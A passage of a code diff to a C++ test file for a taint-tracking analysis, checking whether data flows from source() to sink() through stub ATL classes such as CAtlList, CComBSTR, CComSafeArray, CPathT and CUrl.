list5.Find(x, list5.GetHeadPosition()); - sink(list5.GetAt(pos)); // $ MISSING: ir + CAtlArray a; + a.Add(x); + sink(a[0]); // $ ir + a.Add(0); + sink(a[0]); // $ ir + + CAtlArray a2; + sink(a2[0]); + a2.Append(a); + sink(a2[0]); // $ ir + + CAtlArray a3; + sink(a3[0]); + a3.Copy(a2); + sink(a3[0]); // $ ir + + sink(a3.GetAt(0)); // $ ir + sink(*a3.GetData()); // $ ir + + CAtlArray a4; + sink(a4.GetAt(0)); + a4.InsertArrayAt(0, &a3); + sink(a4.GetAt(0)); // $ ir } - { - CAtlList list6(10); - list6.AddHead(x); - auto pos = list6.FindIndex(0); - sink(list6.GetAt(pos)); // $ ir - } + CAtlArray a5; + a5.InsertAt(0, source(), 1); + sink(a5[0]); // $ ir - { - CAtlList list7(10); - auto pos = list7.GetTailPosition(); - list7.InsertAfter(pos, x); - sink(list7.GetHead()); // $ ir + CAtlArray a6; + a6.SetAtGrow(0, source()); + sink(a6[0]); // $ ir } + } + template> + struct CAtlList { + using INARGTYPE = typename ETraits::INARGTYPE; + CAtlList(UINT nBlockSize) throw(); + ~CAtlList() throw(); + POSITION AddHead(); + POSITION AddHead(INARGTYPE element); + void AddHeadList(const CAtlList* plNew); + POSITION AddTail(); + POSITION AddTail(INARGTYPE element); + void AddTailList(const CAtlList* plNew); + POSITION Find(INARGTYPE element, POSITION posStartAfter) const throw(); + POSITION FindIndex(size_t iElement) const throw(); + E& GetAt(POSITION pos) throw(); + const E& GetAt(POSITION pos) const throw(); + size_t GetCount() const throw(); + E& GetHead() throw(); + const E& GetHead() const throw(); + POSITION GetHeadPosition() const throw(); + E& GetNext(POSITION& pos) throw(); + const E& GetNext(POSITION& pos) const throw(); + E& GetPrev(POSITION& pos) throw(); + const E& GetPrev(POSITION& pos) const throw(); + E& GetTail() throw(); + const E& GetTail() const throw(); + POSITION GetTailPosition() const throw(); + POSITION InsertAfter(POSITION pos, INARGTYPE element); + POSITION InsertBefore(POSITION pos, INARGTYPE element); + bool IsEmpty() const throw(); + void MoveToHead(POSITION pos) throw(); + void MoveToTail(POSITION pos) throw(); + void RemoveAll() throw(); + void RemoveAt(POSITION pos) throw(); + E RemoveHead(); + void RemoveHeadNoReturn() throw(); + E RemoveTail(); + void RemoveTailNoReturn() throw(); + void SetAt(POSITION pos, INARGTYPE element); + void SwapElements(POSITION pos1, POSITION pos2) throw(); + }; + + void test_CAtlList() { + int x = source(); { - CAtlList list8(10); - auto pos = list8.GetTailPosition(); - list8.InsertBefore(pos, x); - sink(list8.GetHead()); // $ ir + CAtlList list(10); + sink(list.GetHead()); + list.AddHead(x); + sink(list.GetHead()); // $ ir + + CAtlList list2(10); + list2.AddHeadList(&list); + sink(list2.GetHead()); // $ ir + + CAtlList list3(10); + list3.AddTail(x); + sink(list3.GetHead()); // $ ir + + CAtlList list4(10); + list4.AddTailList(&list3); + sink(list4.GetHead()); // $ ir + + { + CAtlList list5(10); + auto pos = list5.Find(x, list5.GetHeadPosition()); + sink(list5.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list6(10); + list6.AddHead(x); + auto pos = list6.FindIndex(0); + sink(list6.GetAt(pos)); // $ ir + } + + { + CAtlList list7(10); + auto pos = list7.GetTailPosition(); + list7.InsertAfter(pos, x); + sink(list7.GetHead()); // $ ir + } + + { + CAtlList list8(10); + auto pos = list8.GetTailPosition(); + list8.InsertBefore(pos, x); + sink(list8.GetHead()); // $ ir + } + { + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), x); + sink(list9.GetHead()); // $ ir + } } + + int* p = indirect_source(); { - CAtlList list9(10); - list9.SetAt(list9.GetHeadPosition(), x); - sink(list9.GetHead()); // $ ir + CAtlList list(10); + sink(list.GetHead()); + list.AddHead(p); + sink(list.GetHead()); // $ ir + + CAtlList list2(10); + list2.AddHeadList(&list); + sink(list2.GetHead()); // $ ir + + CAtlList list3(10); + list3.AddTail(p); + sink(list3.GetHead()); // $ ir + + CAtlList list4(10); + list4.AddTailList(&list3); + sink(list4.GetHead()); // $ ir + + { + CAtlList list5(10); + auto pos = list5.Find(p, list5.GetHeadPosition()); + sink(list5.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list6(10); + list6.AddHead(p); + auto pos = list6.FindIndex(0); + sink(list6.GetAt(pos)); // $ ir + } + + { + CAtlList list7(10); + auto pos = list7.GetTailPosition(); + list7.InsertAfter(pos, p); + sink(list7.GetHead()); // $ ir + } + + { + CAtlList list8(10); + auto pos = list8.GetTailPosition(); + list8.InsertBefore(pos, p); + sink(list8.GetHead()); // $ ir + } + { + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), p); + sink(list9.GetHead()); // $ ir + } } } - int* p = indirect_source(); - { - CAtlList list(10); - sink(list.GetHead()); - list.AddHead(p); - sink(list.GetHead()); // $ ir - - CAtlList list2(10); - list2.AddHeadList(&list); - sink(list2.GetHead()); // $ ir - - CAtlList list3(10); - list3.AddTail(p); - sink(list3.GetHead()); // $ ir - - CAtlList list4(10); - list4.AddTailList(&list3); - sink(list4.GetHead()); // $ ir + struct IUnknown { }; + + struct ISequentialStream : public IUnknown { }; + + struct IStream : public ISequentialStream { }; + + struct CComBSTR { + CComBSTR() throw(); + CComBSTR(const CComBSTR& src); + CComBSTR(int nSize); + CComBSTR(int nSize, LPCOLESTR sz); + CComBSTR(int nSize, LPCSTR sz); + CComBSTR(LPCOLESTR pSrc); + CComBSTR(LPCSTR pSrc); + CComBSTR(CComBSTR&& src) throw(); + ~CComBSTR(); + + HRESULT Append(const CComBSTR& bstrSrc) throw(); + HRESULT Append(wchar_t ch) throw(); + HRESULT Append(char ch) throw(); + HRESULT Append(LPCOLESTR lpsz) throw(); + HRESULT Append(LPCSTR lpsz) throw(); + HRESULT Append(LPCOLESTR lpsz, int nLen) throw(); + HRESULT AppendBSTR(BSTR p) throw(); + HRESULT AppendBytes(const char* lpsz, int nLen) throw(); + HRESULT ArrayToBSTR(const SAFEARRAY* pSrc) throw(); + HRESULT AssignBSTR(const BSTR bstrSrc) throw(); + void Attach(BSTR src) throw(); + HRESULT BSTRToArray(LPSAFEARRAY* ppArray) throw(); + unsigned int ByteLength() const throw(); + BSTR Copy() const throw(); + HRESULT CopyTo(BSTR* pbstr) throw(); + + HRESULT CopyTo(VARIANT* pvarDest) throw(); + BSTR Detach() throw(); + void Empty() throw(); + unsigned int Length() const throw(); + bool LoadString(HINSTANCE hInst, UINT nID) throw(); + bool LoadString(UINT nID) throw(); + HRESULT ReadFromStream(IStream* pStream) throw(); + HRESULT ToUpper() throw(); + HRESULT WriteToStream(IStream* pStream) throw(); + + operator BSTR() const throw(); + BSTR* operator&() throw(); + + CComBSTR& operator+= (const CComBSTR& bstrSrc); + CComBSTR& operator+= (const LPCOLESTR pszSrc); + + BSTR m_str; + }; + + LPSAFEARRAY getSafeArray() { + SAFEARRAY* safe = new SAFEARRAY; + safe->pvData = indirect_source(); + return safe; + } + void test_CComBSTR() { + char* x = indirect_source(); { - CAtlList list5(10); - auto pos = list5.Find(p, list5.GetHeadPosition()); - sink(list5.GetAt(pos)); // $ MISSING: ir - } + CComBSTR b(x); + sink(b.m_str); // $ ir + CComBSTR b2(b); + sink(b2.m_str); // $ ir + } { - CAtlList list6(10); - list6.AddHead(p); - auto pos = list6.FindIndex(0); - sink(list6.GetAt(pos)); // $ ir + CComBSTR b(10, x); + sink(b.m_str); // $ ir } - { - CAtlList list7(10); - auto pos = list7.GetTailPosition(); - list7.InsertAfter(pos, p); - sink(list7.GetHead()); // $ ir + CComBSTR b(x); + + CComBSTR b2; + sink(b2.m_str); + b2 += b; + sink(b2.m_str); // $ ir + + CComBSTR b3; + b3 += x; + sink(b3.m_str); // $ ir + sink(static_cast(b3)); // $ ir + sink(**&b3); // $ ir + + CComBSTR b4; + b4.Append(source()); + sink(b4.m_str); // $ ir + + CComBSTR b5; + b5.AppendBSTR(b4.m_str); + sink(b5.m_str); // $ ir + + CComBSTR b6; + b6.AppendBytes(x, 10); + sink(b6.m_str); // $ ir + + CComBSTR b7; + b7.ArrayToBSTR(getSafeArray()); + sink(b7.m_str); // $ ir + + CComBSTR b8; + b8.AssignBSTR(b7.m_str); + sink(b8.m_str); // $ ir + + CComBSTR b9; + LPSAFEARRAY safe; + b9.Append(source()); + b9.BSTRToArray(&safe); + sink(safe->pvData); // $ ir + + sink(b9.Copy()); // $ ir } + wchar_t* w = indirect_source(); { - CAtlList list8(10); - auto pos = list8.GetTailPosition(); - list8.InsertBefore(pos, p); - sink(list8.GetHead()); // $ ir + CComBSTR b(w); + sink(b.m_str); // $ ir + + CComBSTR b2; + b2.Attach(w); + sink(b2.m_str); // $ ir } { - CAtlList list9(10); - list9.SetAt(list9.GetHeadPosition(), p); - sink(list9.GetHead()); // $ ir + CComBSTR b(10, w); + sink(b.m_str); // $ ir } } -} - -struct IUnknown { }; - -struct ISequentialStream : public IUnknown { }; - -struct IStream : public ISequentialStream { }; - -struct CComBSTR { - CComBSTR() throw(); - CComBSTR(const CComBSTR& src); - CComBSTR(int nSize); - CComBSTR(int nSize, LPCOLESTR sz); - CComBSTR(int nSize, LPCSTR sz); - CComBSTR(LPCOLESTR pSrc); - CComBSTR(LPCSTR pSrc); - CComBSTR(CComBSTR&& src) throw(); - ~CComBSTR(); - - HRESULT Append(const CComBSTR& bstrSrc) throw(); - HRESULT Append(wchar_t ch) throw(); - HRESULT Append(char ch) throw(); - HRESULT Append(LPCOLESTR lpsz) throw(); - HRESULT Append(LPCSTR lpsz) throw(); - HRESULT Append(LPCOLESTR lpsz, int nLen) throw(); - HRESULT AppendBSTR(BSTR p) throw(); - HRESULT AppendBytes(const char* lpsz, int nLen) throw(); - HRESULT ArrayToBSTR(const SAFEARRAY* pSrc) throw(); - HRESULT AssignBSTR(const BSTR bstrSrc) throw(); - void Attach(BSTR src) throw(); - HRESULT BSTRToArray(LPSAFEARRAY* ppArray) throw(); - unsigned int ByteLength() const throw(); - BSTR Copy() const throw(); - HRESULT CopyTo(BSTR* pbstr) throw(); - - HRESULT CopyTo(VARIANT* pvarDest) throw(); - BSTR Detach() throw(); - void Empty() throw(); - unsigned int Length() const throw(); - bool LoadString(HINSTANCE hInst, UINT nID) throw(); - bool LoadString(UINT nID) throw(); - HRESULT ReadFromStream(IStream* pStream) throw(); - HRESULT ToUpper() throw(); - HRESULT WriteToStream(IStream* pStream) throw(); - - operator BSTR() const throw(); - BSTR* operator&() throw(); - - CComBSTR& operator+= (const CComBSTR& bstrSrc); - CComBSTR& operator+= (const LPCOLESTR pszSrc); - - BSTR m_str; -}; - -LPSAFEARRAY getSafeArray() { - SAFEARRAY* safe = new SAFEARRAY; - safe->pvData = indirect_source(); - return safe; -} -void test_CComBSTR() { - char* x = indirect_source(); - { - CComBSTR b(x); - sink(b.m_str); // $ ir - - CComBSTR b2(b); - sink(b2.m_str); // $ ir - } - { - CComBSTR b(10, x); - sink(b.m_str); // $ ir - } - { - CComBSTR b(x); - - CComBSTR b2; - sink(b2.m_str); - b2 += b; - sink(b2.m_str); // $ ir - - CComBSTR b3; - b3 += x; - sink(b3.m_str); // $ ir - sink(static_cast(b3)); // $ ir - sink(**&b3); // $ ir - - CComBSTR b4; - b4.Append(source()); - sink(b4.m_str); // $ ir - - CComBSTR b5; - b5.AppendBSTR(b4.m_str); - sink(b5.m_str); // $ ir - - CComBSTR b6; - b6.AppendBytes(x, 10); - sink(b6.m_str); // $ ir - - CComBSTR b7; - b7.ArrayToBSTR(getSafeArray()); - sink(b7.m_str); // $ ir - - CComBSTR b8; - b8.AssignBSTR(b7.m_str); - sink(b8.m_str); // $ ir - - CComBSTR b9; - LPSAFEARRAY safe; - b9.Append(source()); - b9.BSTRToArray(&safe); + template + struct CComSafeArray { + CComSafeArray(); + CComSafeArray(const SAFEARRAYBOUND& bound); + CComSafeArray(ULONG ulCount, LONG lLBound); + CComSafeArray(const SAFEARRAYBOUND* pBound, UINT uDims); + CComSafeArray(const CComSafeArray& saSrc); + CComSafeArray(const SAFEARRAY& saSrc); + CComSafeArray(const SAFEARRAY* psaSrc); + + ~CComSafeArray() throw(); + + HRESULT Add(const SAFEARRAY* psaSrc); + HRESULT Add(ULONG ulCount, const T* pT, BOOL bCopy); + HRESULT Add(const T& t, BOOL bCopy); + HRESULT Attach(const SAFEARRAY* psaSrc); + HRESULT CopyFrom(LPSAFEARRAY* ppArray); + HRESULT CopyTo(LPSAFEARRAY* ppArray); + HRESULT Create(const SAFEARRAYBOUND* pBound, UINT uDims); + HRESULT Create(ULONG ulCount, LONG lLBound); + HRESULT Destroy(); + LPSAFEARRAY Detach(); + T& GetAt(LONG lIndex) const; + ULONG GetCount(UINT uDim) const; + UINT GetDimensions() const; + LONG GetLowerBound(UINT uDim) const; + LPSAFEARRAY GetSafeArrayPtr() throw(); + LONG GetUpperBound(UINT uDim) const; + bool IsSizable() const; + HRESULT MultiDimGetAt(const LONG* alIndex, T& t); + HRESULT MultiDimSetAt(const LONG* alIndex, const T& t); + HRESULT Resize(const SAFEARRAYBOUND* pBound); + HRESULT Resize(ULONG ulCount, LONG lLBound); + HRESULT SetAt(LONG lIndex, const T& t, BOOL bCopy); + operator LPSAFEARRAY() const; + T& operator[](long lindex) const; + T& operator[](int nindex) const; + + LPSAFEARRAY m_psa; + }; + + void test_CComSafeArray() { + LPSAFEARRAY safe = getSafeArray(); sink(safe->pvData); // $ ir - - sink(b9.Copy()); // $ ir - } - - wchar_t* w = indirect_source(); - { - CComBSTR b(w); - sink(b.m_str); // $ ir - - CComBSTR b2; - b2.Attach(w); - sink(b2.m_str); // $ ir - } - { - CComBSTR b(10, w); - sink(b.m_str); // $ ir - } -} - -template -struct CComSafeArray { - CComSafeArray(); - CComSafeArray(const SAFEARRAYBOUND& bound); - CComSafeArray(ULONG ulCount, LONG lLBound); - CComSafeArray(const SAFEARRAYBOUND* pBound, UINT uDims); - CComSafeArray(const CComSafeArray& saSrc); - CComSafeArray(const SAFEARRAY& saSrc); - CComSafeArray(const SAFEARRAY* psaSrc); - - ~CComSafeArray() throw(); - - HRESULT Add(const SAFEARRAY* psaSrc); - HRESULT Add(ULONG ulCount, const T* pT, BOOL bCopy); - HRESULT Add(const T& t, BOOL bCopy); - HRESULT Attach(const SAFEARRAY* psaSrc); - HRESULT CopyFrom(LPSAFEARRAY* ppArray); - HRESULT CopyTo(LPSAFEARRAY* ppArray); - HRESULT Create(const SAFEARRAYBOUND* pBound, UINT uDims); - HRESULT Create(ULONG ulCount, LONG lLBound); - HRESULT Destroy(); - LPSAFEARRAY Detach(); - T& GetAt(LONG lIndex) const; - ULONG GetCount(UINT uDim) const; - UINT GetDimensions() const; - LONG GetLowerBound(UINT uDim) const; - LPSAFEARRAY GetSafeArrayPtr() throw(); - LONG GetUpperBound(UINT uDim) const; - bool IsSizable() const; - HRESULT MultiDimGetAt(const LONG* alIndex, T& t); - HRESULT MultiDimSetAt(const LONG* alIndex, const T& t); - HRESULT Resize(const SAFEARRAYBOUND* pBound); - HRESULT Resize(ULONG ulCount, LONG lLBound); - HRESULT SetAt(LONG lIndex, const T& t, BOOL bCopy); - operator LPSAFEARRAY() const; - T& operator[](long lindex) const; - T& operator[](int nindex) const; - - LPSAFEARRAY m_psa; -}; - -void test_CComSafeArray() { - LPSAFEARRAY safe = getSafeArray(); - sink(safe->pvData); // $ ir - { - CComSafeArray c(safe); - sink(c[0]); // $ ir - sink(c.GetAt(0)); // $ ir - sink(c.GetSafeArrayPtr()->pvData); // $ ir - sink(c.m_psa->pvData); // $ ir - } - { - CComSafeArray c; - sink(c[0]); - sink(c.GetAt(0)); - sink(c.GetSafeArrayPtr()->pvData); - c.Add(safe); - sink(c[0]); // $ ir - sink(c.GetAt(0)); // $ ir - sink(c.GetSafeArrayPtr()->pvData); // $ ir - sink(static_cast(c)->pvData); // $ ir - } - { - CComSafeArray c; - c.Add(source(), true); + { + CComSafeArray c(safe); sink(c[0]); // $ ir sink(c.GetAt(0)); // $ ir sink(c.GetSafeArrayPtr()->pvData); // $ ir + sink(c.m_psa->pvData); // $ ir + } + { + CComSafeArray c; + sink(c[0]); + sink(c.GetAt(0)); + sink(c.GetSafeArrayPtr()->pvData); + c.Add(safe); + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir + sink(static_cast(c)->pvData); // $ ir + } + { + CComSafeArray c; + c.Add(source(), true); + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir + } + { + CComSafeArray c; + c.SetAt(0, source(), true); + sink(c[0]); // $ ir + sink(c[0L]); // $ ir + } } - { - CComSafeArray c; - c.SetAt(0, source(), true); - sink(c[0]); // $ ir - sink(c[0L]); // $ ir - } -} -template -struct CPathT { - typedef StringType PCXSTR; // simplified - CPathT(PCXSTR pszPath); - CPathT(const CPathT& path); - CPathT() throw(); - - void AddBackslash(); - BOOL AddExtension(PCXSTR pszExtension); - BOOL Append(PCXSTR pszMore); - void BuildRoot(int iDrive); - void Canonicalize(); - void Combine(PCXSTR pszDir, PCXSTR pszFile); - CPathT CommonPrefix(PCXSTR pszOther); - BOOL CompactPathEx(UINT nMaxChars, DWORD dwFlags); - BOOL FileExists() const; - int FindExtension() const; - int FindFileName() const; - int GetDriveNumber() const; - StringType GetExtension() const; - BOOL IsDirectory() const; - BOOL IsFileSpec() const; - BOOL IsPrefix(PCXSTR pszPrefix) const; - BOOL IsRelative() const; - BOOL IsRoot() const; - BOOL IsSameRoot(PCXSTR pszOther) const; - BOOL IsUNC() const; - BOOL IsUNCServer() const; - BOOL IsUNCServerShare() const; - BOOL MakePretty(); - BOOL MatchSpec(PCXSTR pszSpec) const; - void QuoteSpaces(); - BOOL RelativePathTo( - PCXSTR pszFrom, - DWORD dwAttrFrom, - PCXSTR pszTo, - DWORD dwAttrTo); - void RemoveArgs(); - void RemoveBackslash(); - void RemoveBlanks(); - void RemoveExtension(); - BOOL RemoveFileSpec(); - BOOL RenameExtension(PCXSTR pszExtension); - int SkipRoot() const; - void StripPath(); - BOOL StripToRoot(); - void UnquoteSpaces(); - operator const StringType&() const throw(); - operator PCXSTR() const throw(); - operator StringType&() throw(); - CPathT& operator+=(PCXSTR pszMore); - - StringType m_strPath; -}; - -using CPath = CPathT; - -void test_CPathT() { - char* x = indirect_source(); - CPath p(x); - sink(static_cast(p)); // $ MISSING: ir - sink(p.m_strPath); // $ ir - - CPath p2(p); - sink(p2.m_strPath); // $ ir - - { - CPath p; - p.AddExtension(x); - sink(p.m_strPath); // $ ir - } - { - CPath p; - p.Append(x); + template + struct CPathT { + typedef StringType PCXSTR; // simplified + CPathT(PCXSTR pszPath); + CPathT(const CPathT& path); + CPathT() throw(); + + void AddBackslash(); + BOOL AddExtension(PCXSTR pszExtension); + BOOL Append(PCXSTR pszMore); + void BuildRoot(int iDrive); + void Canonicalize(); + void Combine(PCXSTR pszDir, PCXSTR pszFile); + CPathT CommonPrefix(PCXSTR pszOther); + BOOL CompactPathEx(UINT nMaxChars, DWORD dwFlags); + BOOL FileExists() const; + int FindExtension() const; + int FindFileName() const; + int GetDriveNumber() const; + StringType GetExtension() const; + BOOL IsDirectory() const; + BOOL IsFileSpec() const; + BOOL IsPrefix(PCXSTR pszPrefix) const; + BOOL IsRelative() const; + BOOL IsRoot() const; + BOOL IsSameRoot(PCXSTR pszOther) const; + BOOL IsUNC() const; + BOOL IsUNCServer() const; + BOOL IsUNCServerShare() const; + BOOL MakePretty(); + BOOL MatchSpec(PCXSTR pszSpec) const; + void QuoteSpaces(); + BOOL RelativePathTo( + PCXSTR pszFrom, + DWORD dwAttrFrom, + PCXSTR pszTo, + DWORD dwAttrTo); + void RemoveArgs(); + void RemoveBackslash(); + void RemoveBlanks(); + void RemoveExtension(); + BOOL RemoveFileSpec(); + BOOL RenameExtension(PCXSTR pszExtension); + int SkipRoot() const; + void StripPath(); + BOOL StripToRoot(); + void UnquoteSpaces(); + operator const StringType&() const throw(); + operator PCXSTR() const throw(); + operator StringType&() throw(); + CPathT& operator+=(PCXSTR pszMore); + + StringType m_strPath; + }; + + using CPath = CPathT; + + void test_CPathT() { + char* x = indirect_source(); + CPath p(x); + sink(static_cast(p)); // $ MISSING: ir sink(p.m_strPath); // $ ir - CPath p2; - p2 += p; - sink(p2.m_strPath); // $ MISSING: ir // this requires flow through `operator StringType&()` which we can't yet model in MaD + CPath p2(p); + sink(p2.m_strPath); // $ ir - CPath p3; - p3 += x; - sink(p3.m_strPath); // $ ir - } + { + CPath p; + p.AddExtension(x); + sink(p.m_strPath); // $ ir + } + { + CPath p; + p.Append(x); + sink(p.m_strPath); // $ ir - { - CPath p; - p.Combine(x, nullptr); - sink(p.m_strPath); // $ ir - } - { - CPath p; - p.Combine(nullptr, x); - sink(p.m_strPath); // $ ir - } + CPath p2; + p2 += p; + sink(p2.m_strPath); // $ MISSING: ir // this requires flow through `operator StringType&()` which we can't yet model in MaD - { - CPath p; - auto p2 = p.CommonPrefix(x); - sink(p2.m_strPath); // $ ir - sink(p2.GetExtension()); // $ ir - } -} + CPath p3; + p3 += x; + sink(p3.m_strPath); // $ ir + } -template -struct CSimpleArray { - CSimpleArray(const CSimpleArray& src); - CSimpleArray(); - ~CSimpleArray(); - - BOOL Add(const T& t); - int Find(const T& t) const; - T* GetData() const; - int GetSize() const; - BOOL Remove(const T& t); - void RemoveAll(); - BOOL RemoveAt(int nIndex); - - BOOL SetAtIndex( - int nIndex, - const T& t); - - T& operator[](int nindex); - CSimpleArray & operator=(const CSimpleArray& src); -}; - -void test_CSimpleArray() { - int x = source(); - { - CSimpleArray a; - a.Add(x); - sink(a[0]); // $ ir - a.Add(0); - sink(a[0]); // $ ir - - CSimpleArray a2; - sink(a2[0]); - a2 = a; - sink(a2[0]); // $ ir - } - { - CSimpleArray a; - a.Add(x); - sink(a.GetData()); // $ ir - - CSimpleArray a2; - int pos = a2.Find(x); - sink(a2[pos]); // $ MISSING: ir - } -} + { + CPath p; + p.Combine(x, nullptr); + sink(p.m_strPath); // $ ir + } + { + CPath p; + p.Combine(nullptr, x); + sink(p.m_strPath); // $ ir + } -template -struct CSimpleMap { - CSimpleMap(); - ~CSimpleMap(); - - BOOL Add(const TKey& key, const TVal& val); - int FindKey(const TKey& key) const; - int FindVal(const TVal& val) const; - TKey& GetKeyAt(int nIndex) const; - int GetSize() const; - TVal& GetValueAt(int nIndex) const; - TVal Lookup(const TKey& key) const; - BOOL Remove(const TKey& key); - void RemoveAll(); - BOOL RemoveAt(int nIndex); - TKey ReverseLookup(const TVal& val) const; - BOOL SetAt(const TKey& key, const TVal& val); - BOOL SetAtIndex(int nIndex, const TKey& key, const TVal& val); -}; - -void test_CSimpleMap() { - wchar_t* x = source(); - { - CSimpleMap a; - a.Add("hello", x); - sink(a.Lookup("hello")); // $ ir - } - { - CSimpleMap a; - auto pos = a.FindKey("hello"); - sink(a.GetValueAt(pos)); // clean - } - { - CSimpleMap a; - auto pos = a.FindVal(x); - sink(a.GetValueAt(pos)); // $ MISSING: ir - } - { - CSimpleMap a; - auto key = a.ReverseLookup(x); - sink(key); - sink(a.Lookup(key)); // $ MISSING: ir - } - { - CSimpleMap a; - a.SetAt("hello", x); - sink(a.Lookup("hello")); // $ ir - } - { - CSimpleMap a; - a.SetAtIndex(0, "hello", x); - sink(a.Lookup("hello")); // $ ir + { + CPath p; + auto p2 = p.CommonPrefix(x); + sink(p2.m_strPath); // $ ir + sink(p2.GetExtension()); // $ ir + } } -} -struct CUrl { - CUrl& operator= (const CUrl& urlThat) throw(); - CUrl() throw(); - CUrl(const CUrl& urlThat) throw(); - ~CUrl() throw(); - - inline BOOL Canonicalize(DWORD dwFlags) throw(); - inline void Clear() throw(); - - BOOL CrackUrl(LPCTSTR lpszUrl, DWORD dwFlags) throw(); - inline BOOL CreateUrl(LPTSTR lpszUrl, DWORD* pdwMaxLength, DWORD dwFlags) const throw(); - - inline LPCTSTR GetExtraInfo() const throw(); - inline DWORD GetExtraInfoLength() const throw(); - inline LPCTSTR GetHostName() const throw(); - inline DWORD GetHostNameLength() const throw(); - inline LPCTSTR GetPassword() const throw(); - inline DWORD GetPasswordLength() const throw(); - inline ATL_URL_PORT GetPortNumber() const throw(); - inline ATL_URL_SCHEME GetScheme() const throw(); - inline LPCTSTR GetSchemeName() const throw(); - inline DWORD GetSchemeNameLength() const throw(); - inline DWORD GetUrlLength() const throw(); - inline LPCTSTR GetUrlPath() const throw(); - inline DWORD GetUrlPathLength() const throw(); - inline LPCTSTR GetUserName() const throw(); - inline DWORD GetUserNameLength() const throw(); - inline BOOL SetExtraInfo(LPCTSTR lpszInfo) throw(); - inline BOOL SetHostName(LPCTSTR lpszHost) throw(); - inline BOOL SetPassword(LPCTSTR lpszPass) throw(); - inline BOOL SetPortNumber(ATL_URL_PORT nPrt) throw(); - inline BOOL SetScheme(ATL_URL_SCHEME nScheme) throw(); - inline BOOL SetSchemeName(LPCTSTR lpszSchm) throw(); - inline BOOL SetUrlPath(LPCTSTR lpszPath) throw(); - inline BOOL SetUserName(LPCTSTR lpszUser) throw(); -}; - -void test_CUrl() { - char* x = indirect_source(); - CUrl url; - url.CrackUrl(x, 0); - sink(url); // $ ir - sink(url.GetExtraInfo()); // $ ir - sink(url.GetHostName()); // $ ir - sink(url.GetPassword()); // $ ir - sink(url.GetSchemeName()); // $ ir - sink(url.GetUrlPath()); // $ ir - sink(url.GetUserName()); // $ ir - - { - CUrl url2; - DWORD len; - char buffer[1024]; - url2.CrackUrl(x, 0); - url2.CreateUrl(buffer, &len, 0); - sink(buffer); // $ ast ir - } - { - CUrl url2; - url2.SetExtraInfo(x); - sink(url2); // $ ir - } - { - CUrl url2; - url2.SetHostName(x); - sink(url2); // $ ir - } - { - CUrl url2; - url2.SetPassword(x); - sink(url2); // $ ir - } - { - CUrl url2; - url2.SetSchemeName(x); - sink(url2); // $ ir + template + struct CSimpleArray { + CSimpleArray(const CSimpleArray& src); + CSimpleArray(); + ~CSimpleArray(); + + BOOL Add(const T& t); + int Find(const T& t) const; + T* GetData() const; + int GetSize() const; + BOOL Remove(const T& t); + void RemoveAll(); + BOOL RemoveAt(int nIndex); + + BOOL SetAtIndex( + int nIndex, + const T& t); + + T& operator[](int nindex); + CSimpleArray & operator=(const CSimpleArray& src); + }; + + void test_CSimpleArray() { + int x = source(); + { + CSimpleArray a; + a.Add(x); + sink(a[0]); // $ ir + a.Add(0); + sink(a[0]); // $ ir + + CSimpleArray a2; + sink(a2[0]); + a2 = a; + sink(a2[0]); // $ ir + } + { + CSimpleArray a; + a.Add(x); + sink(a.GetData()); // $ ir + + CSimpleArray a2; + int pos = a2.Find(x); + sink(a2[pos]); // $ MISSING: ir + } } - { - CUrl url2; - url2.SetUrlPath(x); - sink(url2); // $ ir + + template + struct CSimpleMap { + CSimpleMap(); + ~CSimpleMap(); + + BOOL Add(const TKey& key, const TVal& val); + int FindKey(const TKey& key) const; + int FindVal(const TVal& val) const; + TKey& GetKeyAt(int nIndex) const; + int GetSize() const; + TVal& GetValueAt(int nIndex) const; + TVal Lookup(const TKey& key) const; + BOOL Remove(const TKey& key); + void RemoveAll(); + BOOL RemoveAt(int nIndex); + TKey ReverseLookup(const TVal& val) const; + BOOL SetAt(const TKey& key, const TVal& val); + BOOL SetAtIndex(int nIndex, const TKey& key, const TVal& val); + }; + + void test_CSimpleMap() { + wchar_t* x = source(); + { + CSimpleMap a; + a.Add("hello", x); + sink(a.Lookup("hello")); // $ ir + } + { + CSimpleMap a; + auto pos = a.FindKey("hello"); + sink(a.GetValueAt(pos)); // clean + } + { + CSimpleMap a; + auto pos = a.FindVal(x); + sink(a.GetValueAt(pos)); // $ MISSING: ir + } + { + CSimpleMap a; + auto key = a.ReverseLookup(x); + sink(key); + sink(a.Lookup(key)); // $ MISSING: ir + } + { + CSimpleMap a; + a.SetAt("hello", x); + sink(a.Lookup("hello")); // $ ir + } + { + CSimpleMap a; + a.SetAtIndex(0, "hello", x); + sink(a.Lookup("hello")); // $ ir + } } - { - CUrl url2; - url2.SetUserName(x); - sink(url2); // $ ir + + struct CUrl { + CUrl& operator= (const CUrl& urlThat) throw(); + CUrl() throw(); + CUrl(const CUrl& urlThat) throw(); + ~CUrl() throw(); + + inline BOOL Canonicalize(DWORD dwFlags) throw(); + inline void Clear() throw(); + + BOOL CrackUrl(LPCTSTR lpszUrl, DWORD dwFlags) throw(); + inline BOOL CreateUrl(LPTSTR lpszUrl, DWORD* pdwMaxLength, DWORD dwFlags) const throw(); + + inline LPCTSTR GetExtraInfo() const throw(); + inline DWORD GetExtraInfoLength() const throw(); + inline LPCTSTR GetHostName() const throw(); + inline DWORD GetHostNameLength() const throw(); + inline LPCTSTR GetPassword() const throw(); + inline DWORD GetPasswordLength() const throw(); + inline ATL_URL_PORT GetPortNumber() const throw(); + inline ATL_URL_SCHEME GetScheme() const throw(); + inline LPCTSTR GetSchemeName() const throw(); + inline DWORD GetSchemeNameLength() const throw(); + inline DWORD GetUrlLength() const throw(); + inline LPCTSTR GetUrlPath() const throw(); + inline DWORD GetUrlPathLength() const throw(); + inline LPCTSTR GetUserName() const throw(); + inline DWORD GetUserNameLength() const throw(); + inline BOOL SetExtraInfo(LPCTSTR lpszInfo) throw(); + inline BOOL SetHostName(LPCTSTR lpszHost) throw(); + inline BOOL SetPassword(LPCTSTR lpszPass) throw(); + inline BOOL SetPortNumber(ATL_URL_PORT nPrt) throw(); + inline BOOL SetScheme(ATL_URL_SCHEME nScheme) throw(); + inline BOOL SetSchemeName(LPCTSTR lpszSchm) throw(); + inline BOOL SetUrlPath(LPCTSTR lpszPath) throw(); + inline 